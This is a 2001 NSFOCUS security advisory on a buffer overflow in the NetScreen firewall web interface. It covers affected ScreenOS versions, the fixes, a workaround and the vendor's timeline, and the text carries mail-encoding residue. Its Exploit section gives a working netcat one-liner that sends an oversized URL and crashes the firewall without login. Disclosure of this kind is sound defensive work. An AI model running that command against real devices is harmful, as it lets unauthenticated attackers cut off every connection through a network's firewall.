Date: Tue, 9 Jan 2001 12:55:36 +0800
From: Nsfocus Security Team <security@NSFOCUS.COM.>
To: [email protected]Subject: NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability
NSFOCUS Security Advisory(SA2001-01)
Topic: NetScreen Firewall WebUI Buffer Overflow vulnerability
Release Date=A3=BA Jan 9th, 2001
CVE Candidate Numbers: CAN-2001-0007
Affected system:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
ScreenOS release 1.73r1 on the NetScreen-1000
ScreenOS release 2.01r6 on the NetScreen-10/100
ScreenOS release 2.10r3 on the NetScreen-5
ScreenOS release 2.5r1 on the NetScreen-5/10/100
Non-affected system=A3=BA
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
ScreenOS release 1.73r2 on the NetScreen-1000
ScreenOS release 2.01r7 on the NetScreen-10/100
ScreenOS release 2.10r4 on the NetScreen-5
ScreenOS release 2.5r2 on the NetScreen-5/10/100
Impact:
=3D=3D=3D=3D=3D=3D=3D=3D=3D
NSFOCUS security team has found a buffer overflow vulnerability=
in
NetScreen Firewall WebUI. Exploitation of this vulnerability,
malicious user can launch remote DoS attack to crash the=
firewall.
Description=A3=BA
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
NetScreen Firewall is a popular commercial firewall. It has a Web=
administration interface (default listening at port 80) that=
allows
firewall administrator to configure firewall with browser.=
However,
it is lack of length check-up of input URL. Provided with a=
oversized
URL request, a buffer overflow may take place that will crash the=
NetScreen firewall. In that case, all connections through=
firewall
will be dropped, and the firewall won't response to any=
connection
request. Rebooting the firewall is required to regain its=
functions.
Attackers can launch attack without logining firewall.
All current versions of ScreeOS, including 1.73r1, 2.0r6, 2.1r3=
and
2.5r1 are affected by this vulnerability on occasion that WebUI=
has
been enabled .
Exploit:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall=
will
crash:
$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc=
netscreen_firewall 80
Following information will appear on firewall console=A3=BA
****************************** EXCEPTION=
******************************
Bus error execption (data reference: load or store)
EPC =3D 0x8009AA1C, SR =3D 0x34501007, Cause =3D 0x0080001C
Firewall halts now.
Workaround:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Disable WebUI management or appoint trusted administration host=
before
acquirement and installation of relevant patch.
Vendor Status:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
We have notified NetScreen of this vulnerability on 12/19/2000 .=
On 12/26/2000 NetScreen has issued following ScreenOS release=
versions
to fix the bug:
ScreenOS 1.73r2 on the NetScreen-1000
ScreenOS 2.10r4 on the NetScreen-5
ScreenOS 2.01r7 on the NetScreen-10/100
ScreenOS 2.5.0r2 on the NetScreen-5/10/100
Latest software are available at:
http://www.netscreen.com/support/updates.html
You can also contact NetScreen Technical Support Center
(mailto:support@netscreen.com.) for upgraded software.
Additional Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0007 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE=
entries.
DISCLAIMS:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT=
WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR=
IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL=
NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,=
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL=
DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH=
DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT=
THE
ADVISORY IS NOT MODIFIED IN ANY WAY.
?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <security@nsfocus.com.>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)
